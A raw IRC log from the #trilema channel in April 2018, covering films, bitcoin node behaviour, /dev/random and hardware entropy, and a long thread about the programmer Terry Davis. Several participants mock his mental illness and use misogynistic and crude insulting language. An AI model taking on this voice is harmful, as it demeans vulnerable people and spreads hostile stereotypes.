thought..." in context. 1804376;1524337479;BingoBoingo; BingoBoingo, hard to say no to hopkins etc. << Sure, but the original film has a much better deviant 1804377;1524337517;mircea_popescu;yeahj the red dragon script is terribad, all that woman-interest bs with 4tehchildrenz etc. 1804378;1524337865;BingoBoingo;The Tom Noonan fellow more than makes up for Hopkins absence 1804379;1524337920;danielpbarron;http://btcbase.org/log/2018-04-21#1804361 << he has not seen it 1804380;1524337920;a111;Logged on 2018-04-21 18:26 mircea_popescu: danielpbarron, btw, ask darwin if he ever saw "beyond the forest" ? possibly bette davis' best movie (which, predictably, she hated doing, thought was terrible when done, luckily for the world jack warner existed and the hallucinations of choice and self-determination of 1940s pantsuits went straight nowhere) 1804381;1524337943;mircea_popescu;well, let me know what he thinks if he ever does. 1804382;1524337961;mircea_popescu;better film of woman as satan i do not know. 1804383;1524337984;BingoBoingo;There's also a made for TV adaptation spanning three seasons which no one has time for in 2018 that turns the script into an overt love story between the FBI profiler and the Republican psychiatrist to fill time 1804384;1524338008;mircea_popescu;BingoBoingo, heh. tv junklets you knopw\] 1804385;1524338103;BingoBoingo;Show ends with Jack and Hannibal erotically slicing up the FYIAD fellow and cliff diving to presumed death or a cancelled fourth season of their love story 1804386;1524338818;mircea_popescu;heh 1804387;1524338866;BingoBoingo;Turns out you CAN be too gay for NBC 1804388;1524338882;mircea_popescu;or maybe just not fabulous enough. 1804389;1524338982;BingoBoingo;Also possible. Maybe it was for spreading very 1980's stereotypes of homosexuals? 1804390;1524339657;asciilifeform;http://btcbase.org/log/2018-04-21#1804351 << at some point one of us is doomed to write The Book . folx still walk in with fundamental misconceptions re how bitcoin worx, and there is no ready means of curing'em 1804391;1524339657;a111;Logged on 2018-04-21 16:29 BingoBoingo: The node is unaware of the block's parentage. 1804392;1524342420;phf;that darwin fish conversation was quite pleasant, thanks for reposting it danielpbarron. i skipped it in logs, because of the high tit noise 1804393;1524343173;phf;http://btcbase.org/log/2018-04-21#1804363 << i'm sure he can do a mean ragtime on that piano though, while kicking legs 1804394;1524343173;a111;Logged on 2018-04-21 18:30 trinque: this is what happens when you don't have phf's three generations of bidet before piano. 1804395;1524346039;BingoBoingo;!!Up archytus_ Who is your daddy and what does he do? 1804396;1524346039;deedbot;archytus_ voiced for 30 minutes. 1804397;1524346078;deedbot;http://qntra.net/2018/04/soros-makes-noise-while-preparing-for-withdrawal-from-hungary/ << Qntra - Soros Makes Noise While Preparing For Withdrawal From Hungary 1804398;1524346568;mircea_popescu;http://btcbase.org/log/2018-04-21#1804289 << lulz of all time. 1804399;1524346568;a111;Logged on 2018-04-21 13:38 ckang: most servers are going to that setup though 1804400;1524346605;mircea_popescu;asciilifeform, anyway, it's not EXACTLY no reason. gotta keep the market churning. 1804401;1524346617;mircea_popescu;if they didn't do that, they'd do "euro 5" 1804402;1524347983;mircea_popescu;http://btcbase.org/log/2018-04-21#1804329 << there can't be ; set your nick enforce to on 1804403;1524347983;a111;Logged on 2018-04-21 15:43 avgjoe: so i'd like to ask what happens if there are other "avgjoe" logged on irc and my client change a bit the username to log me in 1804404;1524348027;mircea_popescu;http://btcbase.org/log/2018-04-21#1804340 << approximately none. trb ran without trusted node list for years. 1804405;1524348027;a111;Logged on 2018-04-21 16:00 avgjoe: my question is: if i add nodes that aren't on the trusted nodes list, what are the risks? 1804406;1524348078;mircea_popescu;the point of trusted nodes isn't "don't link to other nodes or bad things weill happen". the point is "always have these in your connection to stay sane", because a major attack vector towards bitcoin is separation, ie get two sets of nodes adrift in different realities. 1804407;1524348156;mircea_popescu;http://btcbase.org/log/2018-04-21#1804343 << blocks are immutable by implementations ; this is both the source of the observation that "bitcoin corrupts absolutely", ie, it is superlative to anything the usg can come up with ; and the whole fucking point of the protocol in the first place. can trust evil people to do your shit, because bitcoin promises it will enforce upon them the dilemma "either be ENTIRELY impotent, or els 1804408;1524348156;a111;Logged on 2018-04-21 16:22 avgjoe: someone (not my server, but some other trb instance) is going to get from who these blocks? 1804409;1524348156;mircea_popescu;e be a good guy". 1804410;1524348257;mircea_popescu;http://btcbase.org/log/2018-04-21#1804350 << as he said, blocks which have no known parent in the extant blockchain are bastards. the other concept is orphans -- blocks who have a parent in the tree, but no descendents at current height. 1804411;1524348257;a111;Logged on 2018-04-21 16:29 avgjoe: other curiosity i've not found on logs: what does it means bastard block on the debug.log? 1804412;1524350450;asciilifeform;http://btcbase.org/log/2018-04-21#1804410 << shitoshi unhelpfully referred to ~both~ as 'orphans' 1804413;1524350450;a111;Logged on 2018-04-21 22:04 mircea_popescu: http://btcbase.org/log/2018-04-21#1804350 << as he said, blocks which have no known parent in the extant blockchain are bastards. the other concept is orphans -- blocks who have a parent in the tree, but no descendents at current height. 1804414;1524350509;asciilifeform;http://btcbase.org/log/2018-04-21#1804401 << what's a euro 5 ? 1804415;1524350509;a111;Logged on 2018-04-21 21:36 mircea_popescu: if they didn't do that, they'd do "euro 5" 1804416;1524350555;asciilifeform;http://btcbase.org/log/2018-04-21#1804404 << shit nodes cost wasted time. potentially infinite amts of it. 1804417;1524350555;a111;Logged on 2018-04-21 22:00 mircea_popescu: http://btcbase.org/log/2018-04-21#1804340 << approximately none. trb ran without trusted node list for years. 1804418;1524350567;asciilifeform;plain dos vector. 1804419;1524351347;mircea_popescu;asciilifeform, "gotta buy a new car" 1804420;1524351487;asciilifeform;aa 1804421;1524353024;*;asciilifeform sitting near usg.capitol, barking loon walks by , shouts at the top of his throat , '... i'ma tell the fucking! truth! about! what! they've done! my daddy was a commander! in ww2! with the goddamn cat! and the monkey! and reagan!' 1804422;1524360810;phf;asciilifeform: couple of weeks ago a gentleman sat down at my table at a capitol hill cafe and after a rather brief and unremarkable small talk started asking me, why "you", which shortly turned to mean the cia, are following me. 1804423;1524360821;phf;following him that is 1804424;1524360885;phf;i started humoring him, "that's what we do", "the hunter must hunt" etc. but that might've been a mistake, because he got progressively more agitated, and i had to depart out of fear of him getting violent 1804425;1524361028;mircea_popescu;i'd be surprised if not a full half of the aspirational 14% is firmly convinced there's MORE THAN ONE man hour / hour spent by me/usg/god/aliens/whoever specifically on their case. 1804426;1524361117;mircea_popescu;where's all this army of deeply interested folk giving a shit about some deeply disinteresting characters to be found... well, in the words of some bum, http://trilema.com/2018/memoranda-of-congress/#selection-305.0-305.420 1804427;1524361377;phf;i think it's a common caricature of late stage bureaucracy though, one bureau watching another, which in turn watches the third, etc. 1804428;1524362888;mircea_popescu;yeah but it doesn't strike me at all like soviet groupshenanigans. 1804429;1524362893;mircea_popescu;this is deeply personal idiocy. 1804430;1524363769;mod6;danielpbarron: ack 1804431;1524363773;mod6;whoops. 1804432;1524363781;mod6;hi all :] 1804433;1524365455;*;mod6 eats log 1804434;1524366125;mod6;alrighy. 1804435;1524392682;mircea_popescu;ben_vulpes, hey, can i get a shared acct for hosting minigame's files etc ? 1804436;1524398147;ckang;someone did some testing of performance on the same hardware for wireguard vs openvpn on a consumer router: 1804437;1524398150;ckang;https://www.skadligkod.se/vpn/wireguard-speed-tests-on-asus-rt-ac86u/ 1804438;1524398162;ckang;https://www.skadligkod.se/vpn/vpn-speedtest-asus-rt-ac86u-merlin-firmware/ 1804439;1524398202;ckang;tl;dr - it was ~200Mbit/s faster (430 vs 240Mbit) 1804440;1524411841;ben_vulpes;mircea_popescu: sure thing, will set that up for you this afternoon 1804441;1524417215;*;BingoBoingo just had a new experience 1804442;1524417239;BingoBoingo;One of the corner bums asked me not for una moneda para comer algo, but for clothing 1804443;1524417679;mircea_popescu;ty ben_vulpes ; ckang : prolly by tomorrow you can have it. 1804444;1524417738;ckang;awesome thanks 1804445;1524417845;ckang;btw: 1804446;1524417848;ckang;1:16 PM anyone in portland? meet me in pioneer square? 1804447;1524417848;ckang;1:17 PM laptop, cool. 1804448;1524417858;ckang;less than 10 mins ago 1804449;1524417868;ben_vulpes;ckang: where is that 1804450;1524417879;ckang;#templeos-irc 1804451;1524417882;ckang;on rizon 1804452;1524417910;ben_vulpes;hmk i emailed him but i'll get in there 1804453;1524417927;ckang;he only gets 15 mins a day of computer 1804454;1524417932;ckang;@ library 1804455;1524417978;asciilifeform;maybe d00d's good candidate for that cheapo-rockchip-lappy 1804456;1524418179;mircea_popescu;how'd he connect to it ? 1804457;1524418199;asciilifeform;lappy 1804458;1524418219;mircea_popescu;and magic cable ? 1804459;1524418239;asciilifeform;nono, recently there was a thread re actual lappy comp, with lcd etc , on same chipset 1804460;1524418250;asciilifeform;runs, supposedly, for whole day on 1 charge, etc 1804461;1524418286;asciilifeform;should, theoretically, boot that very same asciilifeform.gentoo 1804462;1524418306;asciilifeform;!#s c201p 1804463;1524418307;a111;0 results for "c201p", http://btcbase.org/log-search?q=c201p 1804464;1524418309;asciilifeform;hm 1804465;1524418317;ckang;cp2102 ? 1804466;1524418360;asciilifeform;!#s c101pa 1804467;1524418361;a111;4 results for "c101pa", http://btcbase.org/log-search?q=c101pa 1804468;1524418362;asciilifeform;^ it. 1804469;1524418375;*;asciilifeform not -- yet -- tried this beast. 1804470;1524418401;mircea_popescu;asciilifeform, but the internet ? 1804471;1524418411;asciilifeform;it has a 802.11 card 1804472;1524418418;mircea_popescu;dude... 1804473;1524418426;asciilifeform;presumably hobo can find an open router. 1804474;1524418431;mircea_popescu;you think ? 1804475;1524418440;mircea_popescu;raiding is usually done in ca r. 1804476;1524418465;asciilifeform;funnily enuff, i've never done it in car. in a city, can get quite acceptable result with feet. 1804477;1524418475;mircea_popescu;meanwhile in what readers think of log, http://trilema.com/contact-pgp/#comment-125425 1804478;1524418484;asciilifeform;esp. if you can get to the top floor of a tower. 1804479;1524418485;ckang;terry would post off somewhere with wifi before while homeless 1804480;1524418494;ckang;and stay there for days 1804481;1524418498;mircea_popescu;ckang, well then this may work. 1804482;1524418511;asciilifeform;i'ma defer to the experts, e.g. gabriel_laddel, re 'how to hobo' 1804483;1524418525;ckang;hopefully the portland bums are nicer than the SD bums and wont steal his stuff 1804484;1524418548;mircea_popescu;lmao. 1804485;1524418574;mircea_popescu;and whatelse, the portland women are proper-er than the sf women and don't want the sausage ? 1804486;1524418644;ckang;wishful thinking on my part i suppose ;p 1804487;1524418681;ckang;https://www.youtube.com/channel/UCJZTn-fPu-uIA55UI47_cXg 1804488;1524418713;ckang;the last bits he put up before getting his phone taken 1804489;1524418791;ckang;https://www.youtube.com/watch?v=9IRLM73C0dg 1804490;1524418815;ckang;haha, pouring his own 2L in a restaurant 1804491;1524418896;mircea_popescu;let me say something rather... political here. so, an item caught my eye in one of the pastebins or w/e you put in : some guy saying "this bum cost me more than a gf". it entirely illuminated the problem to me : terry davis is JUST as much a perfect representative of the ustarded "brillian computer programmer" as http://trilema.com/2016/the-story-of-elliot-rodger-by-elliot-rodger-adnotated-part-one/ is the representative of t 1804492;1524418896;mircea_popescu;he ustard neet-y teenager. 1804493;1524418928;asciilifeform;mircea_popescu: aha. he's the end stage of the life cycle. 1804494;1524418951;mircea_popescu;terry davis is exactly http://btcbase.org/log/2018-04-13#1798356 except turned up to 11. 1804495;1524418951;a111;Logged on 2018-04-13 19:58 zx2c4: wondering - how might i achieve great wealth and donations for wireguard from you/trilema? 1804496;1524418978;asciilifeform;helps to recall that the d00d is certifiably insane tho ( lived for yrs on a usg pension for insanity. as portrayed by TLP. wonder what happened to this -- they were abolished? i've nfi ) 1804497;1524419037;ckang;i think all terry needs to be happy is a room, bed, internet, diet shasta, beer and cigarettes 1804498;1524419041;mircea_popescu;he has these things he'll do, he's decided aforehand, and nothing around matters ONE WHIT. now, will you pour bitcoin into his sand ? if you do ok, but to quote, http://btcbase.org/log/2018-04-12#1796685 1804499;1524419041;a111;Logged on 2018-04-12 02:38 ckang: Like he will owe something 1804500;1524419061;mircea_popescu;ckang, no, actually, all he needs is an alternate reality where solipsism works. 1804501;1524419073;ckang;when he lost that is when things became a lot worse for his mental state 1804502;1524419075;mircea_popescu;just like everyone else on github. except more... purely so. 1804503;1524419098;mircea_popescu;the other terries actually aquiesce to unprincipled exceptions, which makes them precisely just as fucking insane but entirely less remarkable. 1804504;1524419128;ckang;did you catch the video of him talking about befriending a prostitute ? 1804505;1524419129;mircea_popescu;ckang, no, it's when his entirely deranged mental state became a lot more difficult to "hide", in the sense usual usg.zek "hides" his being raped daily, from himself. 1804506;1524419152;mircea_popescu;you can't go around pretending like he's ok. he's not ok, nor ever was, nor can ever be, but this is not so much a problem to whosoever is willing to apply formal tests only. 1804507;1524419160;mircea_popescu;ckang, i did not. 1804508;1524419160;ckang;oh no hes not okay by any means 1804509;1524419174;ckang;but hes not talent-less 1804510;1524419180;ckang;complex mix 1804511;1524419186;ckang;let me find it, 1 minute 1804512;1524419188;asciilifeform;d00d spends his days having 2way convos with his rng. 1804513;1524419198;asciilifeform;( or did, back when he had a comp... ) 1804514;1524419211;mircea_popescu;asciilifeform, but i can imagine, you know, lenghty string of ustards trying to help, where their help was of the form "we'll expend x resources if you're willing to jump through y hoops" and he refusing and them going umm... why doesn't the form thing work!!1 1804515;1524419249;asciilifeform;mircea_popescu: they lament exactly so, and not specifically about this d00d, but erry single schizo ( incl prolly the one i saw last night ) 1804516;1524419260;mircea_popescu;that's the substance of "costs more than gf" -- resources, spent ; hoops, not jumped. "irrational" behaviour in the imperial contractual sense. 1804517;1524419309;asciilifeform;this is the likely explanation for his transition to hobo stage -- prolly he finally stopped filling out the magic form etc 1804518;1524419329;mircea_popescu;so amusingly enough, THEIR understanding of his mental issue is built entirely of his sanity. his problem is exactly the rest of what they identify. quite interesting marginal case in being so neatly split. usually there's some overlap. 1804519;1524419464;mircea_popescu;but anyway, i'm starting to understand a lot of things about why the maga can never be, consider the gritted, unyielding, sheer determination of http://btcbase.org/log/2018-04-20#1803769 ; and i've noticed my us-born slavegirls CAN NOT QUIT. even when hopeless, even when wasteful, their specific identifiable mark in whatever harem social games is they're the ones that can not fucking say uncle. 1804520;1524419464;a111;Logged on 2018-04-20 17:44 mircea_popescu: finally coming out of the massive bender at t2, the dude WOULD STILL LIKE TO EAT. how would you eat if you were him ? would you give up, do something else with your time ? he doesn't give up. he's fucking dedicated. 1804521;1524419487;mircea_popescu;now, 50, 100 years ago this was a great characteristic of that maybe-one-day-a-nation conglomeration in our colonies. 1804522;1524419569;mircea_popescu;meanwhile it's become a fixation in the children ; now merge it with the church of self esteem and its holy youcandoanything, and the REASON http://btcbase.org/log/2018-04-16#1800094 ie "smart kids" always being found with their pants down acting the "man alone" part and never learning anything from the experience is pretty fucking clear. 1804523;1524419569;a111;Logged on 2018-04-16 16:19 mircea_popescu: man acting alone is stuck with these "oh, a conclave of idiots bent on self preservation and avoiding the lowly station their idiocy warrants them holds all the power, and i'll act as man alone confronted by governemnt". 1804524;1524419585;mircea_popescu;larping, yes, but not merely for fun nor profit. larping as a life philosophy. 1804525;1524419642;mircea_popescu;now go ahead and make it great again. HOW ? they lack the instruments with which they'd agree upon a great in the first place. collection of terries, give them coffee or not give them coffee, they'll move about like an algae bloom. 1804526;1524419752;mircea_popescu;because it's not just terry. the entire population of github, from http://btcbase.org/log-search?q=dgerard to http://btcbase.org/log/2018-04-06#1793426 and ALL shades in between, nothing, EXACTLY NOTHING but little terries running about. 1804527;1524419752;a111;Logged on 2018-04-06 00:00 deedbot: http://trilema.com/2018/heres-what-polyamory-is-not/ << Trilema - Here's what "polyamory" is not : 1804528;1524419836;mircea_popescu;now how the fuck can you build anything out of 100`000`000 elliots and 10`000`000 terries ? because that's the other fucking half of http://trilema.com/2014/pushing-the-soft-tender-flesh-of-a-friend-against-the-sharp-rotating-blades-of-the-immutable-machine/#selection-967.295-971.2 "how much does the devil have to pay you to love him" problem. 1804529;1524419841;mircea_popescu;PAY WHO!!!???!?!?! 1804530;1524420010;mircea_popescu;then they go all http://trilema.com/2016/alexacom-or-the-measurable-web-delusion/ but seriously... "uniques" ? holy shit they're not uniques, they're either little terries or little elliots. seriously, they READ YOU ? how the fuck could they ~possibly~ have read you past the psychogenic noise scrolldown going on in front of their eyes non-stop ? exactly http://btcbase.org/log/2018-04-22#1804512 holy shit, "i have the attentio 1804531;1524420010;a111;Logged on 2018-04-22 17:46 asciilifeform: d00d spends his days having 2way convos with his rng. 1804532;1524420010;mircea_popescu;n of the lava lamp". 1804533;1524420090;asciilifeform;iirc before davis went fullbore barmy, he was gainfully employed , in the old-fashioned sense, wrote embedded os thing for -- iirc -- 'ticketmaster' co 1804534;1524420099;mircea_popescu;that's my recollection. 1804535;1524420128;asciilifeform;whatever other mental cockroaches he could have suffered from in youth, it is all quite thoroughly masked nao by having gone properly batshit 1804536;1524420134;mircea_popescu;and i'm pretty sure you're exactly right, he could be into fiat again if he started filling in the magic form again. 1804537;1524420201;mircea_popescu;anyway, this is kinda what i was unknowingly reaching for, with the http://btcbase.org/log/2018-04-20#1803880 : more data to extract the understanding out of what looked like a promising vein. but in the meanwhile sleep reorganized observation for me and now it's quite fucking plain. 1804538;1524420201;a111;Logged on 2018-04-20 18:55 mircea_popescu: ben_vulpes, well, buy him a steak. 1804539;1524420240;asciilifeform;d00d's on his unstoppable journey into the upper tundra. 1804540;1524420263;ckang;https://www.youtube.com/watch?v=51iQOlOim4c 1804541;1524420275;ckang;cant find the archive.org copy, it was called FirstMate.mp4 1804542;1524420282;asciilifeform;prolly not long left. 1804543;1524420307;ckang;but an interesting story, this was shortly after he got kicked out 1804544;1524420371;mircea_popescu;asciilifeform, not even worth the http://btcbase.org/log/2017-08-02#1692407 bullet. 1804545;1524420371;a111;Logged on 2017-08-02 01:17 mircea_popescu: phf reminds me of fucktard murdock "oh, we were first apple store" 1804546;1524420419;asciilifeform;mircea_popescu: he never had anyffing at all they judged to be worth stealing. 1804547;1524420441;mircea_popescu;before being terminated, ALSO gainfully employed (writing nsa crapolade for "docker" -- remember, if they're not dockers, they're just pants!) 1804548;1524420479;mircea_popescu;asciilifeform, or rather, knew how. see, murdock has "brand" or however you call the fool's gold they're only preoccupied with. they know how to steal that. 1804549;1524420481;asciilifeform;a certified nutter is one of the 'safest' things to be, from this pov 1804550;1524420489;mircea_popescu;whereas davis had less useful things -- they work. 1804551;1524420493;asciilifeform;aha. 1804552;1524420499;mircea_popescu;they don't look, they work. wtf can you do with something that works! 1804553;1524420503;asciilifeform;worx, but no 'brand'. 1804554;1524420511;mircea_popescu;well what's the use of that! 1804555;1524420513;asciilifeform;sorta how asciilifeform is still alive. same dynamic. 1804556;1524420556;asciilifeform;if there's no debian-style herd of ruminants attached, to your 'brand', then ~invisible to these folx. 1804557;1524420562;asciilifeform;and can live for surprisingly long time. 1804558;1524420626;mircea_popescu;asciilifeform, see, this is one of the best arguments re http://btcbase.org/log/2018-04-20#1803989 (though the correct word is punk, ie http://trilema.com/2012/big-rock-candy-mountain/#selection-227.1-233.34 ) : dood got fucked with the brand thing, stood himself up shakily, dusted self off... and dived right back into it! 1804559;1524420626;a111;Logged on 2018-04-20 19:31 ckang: weev is an actual cuck btw, the true definition 1804560;1524420661;mircea_popescu;STILL doesn't want to do things that work, but things that shine. well... why the fuck ? oobviously http://trilema.com/2017/yitzhaks-trilemma/ 1804561;1524420717;ckang;i think the last thing i heard weev say he was working on, was some python code to detect if a person in a photo is black or white 1804562;1524420728;ckang;tensorflow i imagine 1804563;1524420767;asciilifeform;such invention!111 1804564;1524420771;mircea_popescu;asciilifeform, there's a very interesting protection factor at work, too! if you do enough things that work, you can do plenty of things that in other people would create "brand" and be immune from it! consider the bit spyked recently dredged up, http://trilema.com/2009/niste-rigoare-pentru-mircea-badea/ 1804565;1524420806;ben_vulpes;ckang: i actually think that'd be a hilarious statistics project; just clustering on skeleton segment lengths would probably be enough to assplode the leftists heads 1804566;1524420833;ckang;heh yea ive been trying to come up with a good use for tensorflow 1804567;1524420834;ben_vulpes;"but the code of conduct says that the software cannot be allowed to say things about race etc!" 1804568;1524420859;ben_vulpes;ckang: "from causes, not towards purposes" 1804569;1524420865;trinque;> Terry needs like, clear evidence that there's a point to this fucking 1804570;1524420882;trinque;what a life 1804571;1524420891;ckang;lol you listening to his story? 1804572;1524420896;mircea_popescu;asciilifeform, i mean consider the lengthy list of shit. sent "academician" into retirement ? raped bank new arsehole ? raped govt ministry new arsehole, and as a community project no less ? raped... mit's "media lab" new arsehole ? exposed assets, exposed toolchains, i can do whatever the fuck i please and ~NOT~ be famous. 1804573;1524420928;mircea_popescu;do one iota of things that work, get iota^? worth of things that brand free! 1804574;1524420939;asciilifeform;mircea_popescu: in uncle al terminology, 'they proclaimed it was Bad Luck and carried on' 1804575;1524420950;mircea_popescu;and they will, too! 1804576;1524420988;mircea_popescu;somehow at all junctures it was always "a better choice" in imperial logic to "blame bad luck", maybe execute a scapegoat or other, than identify the goldstein. 1804577;1524420995;mircea_popescu;doesn't it make you stop and wonder ? 1804578;1524421011;asciilifeform;it's the only ~effective tool in their box tho 1804579;1524421022;mircea_popescu;but they could try a different ineffective one! 1804580;1524421063;mircea_popescu;you know how "alt right" picked "soros" to be "the evil billionaire behind everything" ? do you suppose THAT is what prevents the "mainstream left" from identifying the evil billionaire behind their precious cuntlet losing the precious election and everything else ? 1804581;1524421079;mircea_popescu;maybe i owe some thanks to these folk i don't even realise... 1804582;1524421111;asciilifeform;as soon as the smarter folx in the enemy camp get the notion that there's somewhere to defect to -- game over 1804583;1524421119;asciilifeform;and enemy -- knows this. 1804584;1524421147;asciilifeform;ergo ~100% of effectual effort -- spent on squid ink. 1804585;1524421149;trinque;I won't spend too much time on this, but it's interesting that he transitions from third person self-reference to first person when he gets angry. 1804586;1524421173;trinque;herr davis, I mean. 1804587;1524421178;asciilifeform;trinque: afaik commonplace among schizo sufferers 1804588;1524421210;ckang;yea seems to depend if hes in a manic state or not 1804589;1524421258;trinque;eh I don't buy the political terms for all this; that appears to be when his brain *is* working, instead of farting around in neurotic loops 1804590;1524421277;mircea_popescu;trinque, let me tell you a story. so during napoleon era, for the first time "general army" was introduced, before that it was all profesisonal soldiery. huge humongous legions of draft dodgers, because really now, draft ? and napoleon standing for the "reasoning" "humanism" thingee of course introduced doctors to check whether medical claims were factual (most common amongst which, blindness). 1804591;1524421281;mircea_popescu;now you tell me, how did they check ? 1804592;1524421288;BingoBoingo; you know how "alt right" picked "soros" to be "the evil billionaire behind everything" ? do you suppose THAT is what prevents the "mainstream left" from identifying the evil billionaire behind their precious cuntlet losing the precious election and everything else ? << "mainstream" left has as an anchor that "individual people can 1804593;1524421295;BingoBoingo;'t" 1804594;1524421316;mircea_popescu;BingoBoingo, but what individual ? what, it seems to you #trilema is individual ? 1804595;1524421326;trinque;mircea_popescu: aimed musket at their heads? 1804596;1524421340;mircea_popescu;no, but built special walkway with sudden low ceiling, saw if they ducked. 1804597;1524421348;mircea_popescu;blind or no blind, french peasant isn't taking one to the head. 1804598;1524421354;trinque;heh! nb 1804599;1524421377;BingoBoingo;mircea_popescu: The single typing fuckgoat they imagine is doing all the talking because... unfair. Shannonizer blindeness is internalized. 1804600;1524421386;mircea_popescu;see, that's not "one weird trick". that's how EVERYTHING works. the basic 101 of http://trilema.com/2012/strategic-superiority-a-saga/#selection-233.62-233.144 1804601;1524421409;mircea_popescu;when lawyer wants to test for truth, he offers guy obvious easy explanation, sees if guy takes it. if he does... he's looking for an out, isn't he! 1804602;1524421434;mircea_popescu;and so yes, when he's angry his pretense fails to keep up. 1804603;1524421508;BingoBoingo;To pantsuit all of #trilema has to read as vexual as vexual reads to us 1804604;1524421514;mircea_popescu;you think ? 1804605;1524421596;asciilifeform;mircea_popescu: so, y'think d00d is malingering ? 1804606;1524421612;asciilifeform;if malingering, wainot fill out them forms. 1804607;1524421613;mircea_popescu;i can't call it ; but would be no worse strategy than what's the ru guy's name 1804608;1524421639;asciilifeform;i can see malingerers for pension, or for draft-dodging, but what's his then for ? 1804609;1524421654;mircea_popescu;yes, that's the nail. the ru guy did take what was it, some sort of something. 1804610;1524422879;BingoBoingo; you think ? << Probably. Nothing else explains Sweden's continued doubling down other than handicapping themselves because "dat signal's racist" 1804611;1524423041;mircea_popescu;well, stupidity alwayus explains. 1804612;1524425084;deedbot;http://qntra.net/2018/04/amazon-washington-post-sinks-to-new-lows-of-undisclosed-advertorial-content/ << Qntra - Amazon Washington Post Sinks To New Lows Of Undisclosed Advertorial Content 1804613;1524425517;lobbes; [...] "dat signal's racist" << ayup. Pantsuit trains "autoimmune response" to specific signals, and causes all kinds of broken thinking. I posit that this is the root cause of things such as >> http://btcbase.org/log/2014-08-06#784482 1804614;1524425517;a111;Logged on 2014-08-06 00:42 mike_c: i have been in the newspaper multiple times, and i have been in trilema posts multiple times. one of these means more than the other, but I can only show my mother the newspaper clippings :) 1804615;1524425603;lobbes;also: http://archive.is/AiwcQ#selection-1157.93-1157.211 1804616;1524426057;mircea_popescu;i wonder what he's up to. 1804617;1524429728;diana_coman;is there a tmsr patch/recipe for feeding /dev/random from fgs? my search of logs yielded only http://btcbase.org/log/2018-02-09#1783118 1804618;1524429728;a111;Logged on 2018-02-09 20:57 mircea_popescu: drivers/char/random.c is what needs changing. wipe the calls to "add_disk_randomness" and bullshit, replace with your fg feeder. 1804619;1524429765;mircea_popescu;nothing published afaik. 1804620;1524431645;mod6;I was going through my mom's stuff yesterday, she kept all kinds of trilema clippings. 1804621;1524431680;mod6;Hehe, she printed them off, three-hole punched 'em, and put em in a binder, no less. 1804622;1524432290;asciilifeform;diana_coman: out of curiosity, why do you want to put your fg's through linus's whitener ? 1804623;1524432334;*;asciilifeform never implemented a fgtronic /dev/random replacement , quite deliberately, and iirc the reasons are in the log 1804624;1524432431;asciilifeform;http://btcbase.org/log/2017-06-13#1669565 << 1 thread 1804625;1524432431;a111;Logged on 2017-06-13 16:11 asciilifeform: mircea_popescu: iirc we had a thread even here where somebody whined that FG doesn't work as a 'totem' where you 'plug in and forget and it just becomes your /dev/random' and that it has to be actively ~used~ 1804626;1524432440;diana_coman;asciilifeform, in short: bridge gap until eulora's server migrates to eucrypt; not a solution to anything, nor a desired anything 1804627;1524432480;asciilifeform;http://btcbase.org/log/2017-02-24#1617414 << iirc orig thread 1804628;1524432480;a111;Logged on 2017-02-24 02:05 asciilifeform: which is why /dev/random was a terrifyingly bad idea from day 1./ 1804629;1524432484;asciilifeform;diana_coman: fair'nuff 1804630;1524432501;asciilifeform;diana_coman: iirc danielpbarron had a roughly working hack that did what you asked for 1804631;1524432508;*;asciilifeform brb, eating 1804632;1524432541;mircea_popescu;mod6, really ?! 1804633;1524432567;mircea_popescu;asciilifeform, in practical terms, how do you want s.mg to use fgs until rewritten ? 1804634;1524432582;mircea_popescu;danielpbarron, got ? 1804635;1524433780;deedbot;http://trilema.com/2018/the-top-brass/ << Trilema - The Top Brass 1804636;1524436746;danielpbarron;diana_coman, a package called sys-apps/rng-tools has a thing called 'rngd' 1804637;1524436823;mod6;mircea_popescu: Yeah! Kinda neat. Bunch of Qntra articles too. 1804638;1524436872;mod6;asciilifeform mircea_popescu diana_coman et. al. re: rngd : http://logs.bvulpes.com/pizarro?d=2018-4-13#332963 << Where I discover the author of this thing 1804639;1524436872;mimisbrunnr;Logged on 2018-04-13 01:48 mod6: Looks like maybe we need to do the latter -- write our own. Did anyone notice that Jeff Garzik is one of the authors of this thing? 1804640;1524436904;mircea_popescu;heh 1804641;1524436919;mod6;http://logs.bvulpes.com/pizarro?d=2018-4-13#333199 << this too. 1804642;1524436919;mimisbrunnr;Logged on 2018-04-13 12:46 mod6: you know what else in interesting, when i breezed super fast through the code last night (I need to review it more), i noticed that this thing has it's own copy of "ent" embedded inside. 1804643;1524436920;danielpbarron;yeah it's way slower than getting the random from FG directly 1804644;1524437074;mod6;The main thing that I wanted to do was come up with a TMSR~ blessed methodology for Pizarro clients to use to fruitfully use their in-chassis FG. 1804645;1524437113;mod6;Then post it somewhere for all to see. And if they want to make their own / can make their own, then that's fine. But we should work towards this. 1804646;1524439142;mircea_popescu;mod6, indeed. 1804647;1524442470;asciilifeform;http://btcbase.org/log/2018-04-22#1804633 << sadly asciilifeform is not so familiar with the existing proggy, to answer this properly 1804648;1524442470;a111;Logged on 2018-04-22 21:29 mircea_popescu: asciilifeform, in practical terms, how do you want s.mg to use fgs until rewritten ? 1804649;1524442666;mircea_popescu;yeah. anyway, i'm thinking the best approach would actually be a kernel patch to destroy the extant random/urandom bs and replace it with fg 1804650;1524442708;mircea_popescu;ideally simply have it exposed as /dev/random 1804651;1524443076;asciilifeform;right 1804652;1524443094;asciilifeform;would have to properly handle all types of attachment for the fg tho ( usb serial, genuine serial, etc ) 1804653;1524443116;asciilifeform;and so would be sensitive to device init order, which imho is icky 1804654;1524443135;asciilifeform;asciilifeform often wonders if we're doomed to make a pci fg 1804655;1524443165;asciilifeform;( why not made originally ? pci adds 100x the complexity; ugly; expensive ) 1804656;1524443198;asciilifeform;the pc arch just plain old suxxxx. every method of dealing with this, has own tradeoff. 1804657;1524443266;*;asciilifeform will admit, to having sat down to write a kernel mod for fg no fewer than 3 times, and barfed each time 1804658;1524443361;asciilifeform;https://archive.li/xhVBU << in related vintage entomology . 1804659;1524443634;asciilifeform;( for the sake of record : a non-retarded arch would do random like-so : ~as a cpu instruction~ that reads from N ~asynchronous~ ports , where N is odd, debias, and xor ) 1804660;1524443711;asciilifeform;speaking of fg, ave1 really oughta have gotten his fg crate by nao 1804661;1524443713;asciilifeform;ave1 didja get it ? 1804662;1524443726;asciilifeform;the 2nd attempt at the crate went out on the 11th 1804663;1524443814;asciilifeform;https://elixir.bootlin.com/linux/latest/source/drivers/char/random.c << the 'traditional' /dev/random. ( get yer barf bag ready! ) 1804664;1524443838;asciilifeform;pointerolade, spinlock, sha1, you name it , it's got it... 1804665;1524443852;asciilifeform;and 2200+ln 1804666;1524443873;asciilifeform;( not including #include'd rubbish, of which there is a mountain, as is typical ) 